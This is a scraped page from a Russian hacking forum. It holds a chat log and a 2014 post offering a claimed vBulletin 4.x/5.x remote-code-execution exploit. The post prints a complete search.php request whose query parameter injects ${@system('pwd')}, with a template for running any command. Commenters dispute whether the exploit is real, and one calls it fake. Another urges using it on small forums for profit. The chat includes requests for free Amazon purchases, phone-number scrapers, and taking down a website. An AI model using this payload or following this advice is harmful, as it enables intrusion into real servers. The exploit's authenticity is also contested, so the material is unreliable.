Интересное в сети

Мы Вконтакте

Посетители

Сейчас на сайте: 10
Пользователей: 0
Гостей: 8

Пользователи онлайн:

- отсутствуют

Гости (20 последних):

Гость-2,

Гость-3,

Гость-4,

Гость-5,

Гость-6,

Гость-7,

Гость-8

Роботы:

Yandex,

Mail Ru

Статистика

Категории меню

Чат

Чтобы оставлять сообщения - зарегистрируйтесь

admin
22 апр 2023, 22:46

*Diablomy, привет дружище
Diablomy
22 апр 2023, 14:50

смайликом промахнулся
Diablomy
22 апр 2023, 14:49

Фигасе, лет 10 меня не было тут admin привет!
admin
10 апр 2023, 05:55

*voska89, no
voska89
10 апр 2023, 01:41

Helli admin ! PLease upgrade my account to group uploader . I am uploader soft and ebook
admin
2 мар 2023, 23:18

*Ytkanos1337, сайту 12 лет и некоторые старые и неактуальные на сегодняшний день разделы и темы могут быть удалены.
Ytkanos1337
28 фев 2023, 13:41

Почему "Внимание! Обнаружена ошибка
Пользователи не имеют доступа для просмотра статей из данного раздела." ?
Proton
22 фев 2023, 00:25

Кому нужен ворк пишите мне
valery17
16 фев 2023, 16:32

На сайте очень много битых ссылок. Непорядок!
Джакомо
12 янв 2023, 12:28

Собираю команду. цель убийство сайта миротворец !
tversetty
9 янв 2023, 13:41

я на триаланет еще сидел и уфолабс, были 3 самых топовых сайта на dle. сейчас одни форумы, я рот ебал их
tversetty
9 янв 2023, 13:37

у тебя же сайт за клаудфларой, почему боишься яровой?
tayfun221
8 окт 2022, 18:29

Всем привет как выложить видео в тик ток ?
Maxonix
2 сен 2022, 03:15

Нужно задать алгоритм, чтобы с нужного сайта мне такие картинки прислало
Maxonix
2 сен 2022, 03:15

Тут кто нибудь может помочь , а то ни разобрался?
Maxonix
2 сен 2022, 03:14

Всем привет
Twiksar
24 авг 2022, 12:38

Кто знает, как покупать на Амазоне бесплатно? Помогите пожалуйста, буду очень благодарен.
Kvakowski
6 авг 2022, 21:29
Hades1234
21 июл 2022, 22:52

для соц сетей номера телефонов. По ключевым фразам. Помню были на форуме проги.
Hades1234
21 июл 2022, 22:51

Ребят подстажите парсер
Hades1234
21 июл 2022, 22:51

Всем привет!
Братишка
2 июл 2022, 18:47

Как мариноват огурци
MAZAXAKER
21 июн 2022, 21:04

Admin, передай привет SyGaK. ИНШААЛЛАХ!
admin
14 июн 2022, 10:17

*marselshou, Atomic Warez Leecher
marselshou
6 июн 2022, 16:55

у кого есть прога Atomic Warez Leecher? дайте пж вк od marselshowyoutube
Kvakowski
26 апр 2022, 12:56

*Jons, привет
Jons
25 апр 2022, 05:15

Привет всем
Alexsandr7
10 апр 2022, 17:25

ОТДАМ АКК ВК
kanistra
23 мар 2022, 14:49

Ребят как найти generate death by up0 v 5.0 немогк найти?
tayfun221
22 мар 2022, 20:13

или любой другой ,может кто написать сможет ,что бы автоматом подключалс к Пулу . И вывод был ,готов с таким человеком поработать .Серьезно .

Закрыть Сохранить настройки Сохранить изменения Разбанить Удалить все

Вставить Отмена

Опрос на сайте

Как Вы нашли нас?

Уязвимость в форумах vBulletin

Автор: Kvak | Дата: 3-03-2014, 17:19 | Комментариев: 0 | Просмотров: 9 803

На топовый форумах конечно не работает, но на школофорумах вполне. Инфа была слита давно, но тут не было!
[Информация]
-Уязвимость продается тут: 1337 day
-Уязвимые версии: vBulletin v4.x.x and 5.х.x
-Цена на офф. сайте: 7000$ (~245000 рублей)
-Распространенность на 02.03.2014: 5/5
-Платформа: PHP
-Возможности: Shell Upload / Remote Code Execute

[Продаваемая уязвимость]

search.php?ajax=0&beforeafter=after&childforums=1&exactname=1&exclude=&forumchoice=&nocache=0&query= %24%7b%40system('pwd')%7d&quicksearch=0&replyless=0&replylimit=0&saveprefs=1&searchdate=0&searchthre adid=0&searchtype=1&searchuser=1&showposts=0&sortby=rank&sortorder=descending&starteronly=0&tag=17&t itleonly=0&userid=0
# "query" param
# php code to inject : ${@system('put command here')}

ВАЖНО, для того что-бы юзать данный шел нужно иметь знания по PHP

Пароль на все архивы: hh

Теги: уязвимость vbulletin булка шелл

Категория: Пентест

Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь.
Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.

Написал: EL_BARTO
Дата: 3 марта 2014 17:25

Новостей: 6
Комментариев: 23

как заюзать

Написал: itz
Дата: 3 марта 2014 17:33

Новостей: 0
Комментариев: 39

Цитата: EL_BARTO

как заюзать

Не для средних умов.

Написал: OwNeR
Дата: 3 марта 2014 17:35

Новостей: 2
Комментариев: 118

Цитата: EL_BARTO

как заюзать

за4ем? все нормальные форумы уже закрыли давным давно все так называемые баги, а школо-форумы некому не нужны +

ВАЖНО, для того что-бы юзать данный шел нужно иметь знания по PHP

--------------------

Написал: Хохол
Дата: 3 марта 2014 17:57

Новостей: 0
Комментариев: 82

шток я тебя переплюну fuck

Написал: Niggapro
Дата: 3 марта 2014 18:12

Новостей: 0
Комментариев: 9

Цитата: Вентилятор Верблюдович

шток я тебя переплюну fuck

фак ю бич я видел же за тобой Отдел К приезжал.

Написал: Mason
Дата: 3 марта 2014 18:26

Новостей: 50
Комментариев: 523

Цитата: Niggapro

Цитата: Вентилятор Верблюдович

шток я тебя переплюну fuck

фак ю бич я видел же за тобой Отдел К приезжал.

ещё одна шкурятина красножопая,сколько вас тут?? определяйтесь как швея)))

--------------------

Нет неразрешимых проблем, есть неприятные решения.

Написал: devioo
Дата: 3 марта 2014 22:11

Новостей: 0
Комментариев: 1

7000$? Вы че упоролись? Там цена указана не в долларах а во внутрисайтовой валюте.

Написал: itz
Дата: 3 марта 2014 22:14

Новостей: 0
Комментариев: 39

Цитата: devioo

7000$? Вы че упоролись? Там цена указана не в долларах а во внутрисайтовой валюте.

1$ = 1 Gold

Написал: skog
Дата: 4 марта 2014 01:02

Новостей: 0
Комментариев: 7

fake
http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcem
ents_aa/4007719-regarding-claims-of-new-0-day-exploits-in-vbulletin

http://hacksociety.net/Thread-Leak-vBulletin-v4-x-x-and-5-%D1%85-x-Shell-Upload-
Remote-Code-Execute-0day

Написал: putok1234
Дата: 4 марта 2014 01:46

Новостей: 0
Комментариев: 6

ахахахах блин былобы тут хоть чтобы стоющие =)

Написал: Wiser
Дата: 4 марта 2014 08:52

Новостей: 1
Комментариев: 27

уже пару месяцев как знаю эту уязв.

--------------------

Общий Аккаунт Apple НЕДОРОГО !!!

Написал: SyGaK
Дата: 4 марта 2014 13:08

Новостей: 114
Комментариев: 1 311

Цитата: putok1234

ахахахах блин былобы тут хоть чтобы стоющие =)

Ну тупой ты, че ещё сказать)

--------------------

ушел навсегда.

Написал: -=eXclass=-
Дата: 7 марта 2014 16:17

Новостей: 8
Комментариев: 106

Цитата: Wiser

уже пару месяцев как знаю эту уязв.

знать одно, а юзать другое.

// это фейк.

Написал: ooray
Дата: 8 марта 2014 16:36

Новостей: 0
Комментариев: 32

не приятная новость для меня smile-13

--------------------

www.igrosok.info

Написал: RSLab.su
Дата: 9 марта 2014 15:34

Новостей: 0
Комментариев: 6

Цитата: OwNeR

Цитата: EL_BARTO

как заюзать

ВАЖНО, для того что-бы юзать данный шел нужно иметь знания по PHP

Школофорумы это халявный траффик, дубовая ты башка. Не знаешь - не раззевай свой поганый пищеприёмник. Только с них с помощью этой дырочки можно не хило навариться.

--------------------

Го ко мне - userbot.ru

Написал: Iliusify
Дата: 10 марта 2014 16:50

Новостей: 0
Комментариев: 31

Эта RCE'шка уже как год переходит от одного форума к другому и в большинстве случаев, копипаст от одного автора. Новость не новая конечно, но лично находит подходящие форумы, на которых всё ещё работает, в основном 4.1.10

Написал: -=eXclass=-
Дата: 12 марта 2014 14:11

Новостей: 8
Комментариев: 106

Цитата: Iliusify

ти is_durak чтоли? lol

её нашли гдето 4 мес. назад всего то.

Написал: Iliusify
Дата: 15 марта 2014 14:39

Новостей: 0
Комментариев: 31

Цитата: -=eXclass=-

ти is_durak чтоли? lol

её нашли гдето 4 мес. назад всего то.

Её нашли в 2013 году и сразу же запостили на 337day. Дабы не вдаваться в подробности даты, ибо я думал, что это вряд-ли кого-то интересует, я округлил дату до года и думал, что на это никто не обратит внимания, ибо суть моего поста заключается в ином..

Уязвимость в форумах vBulletin

Добавление комментария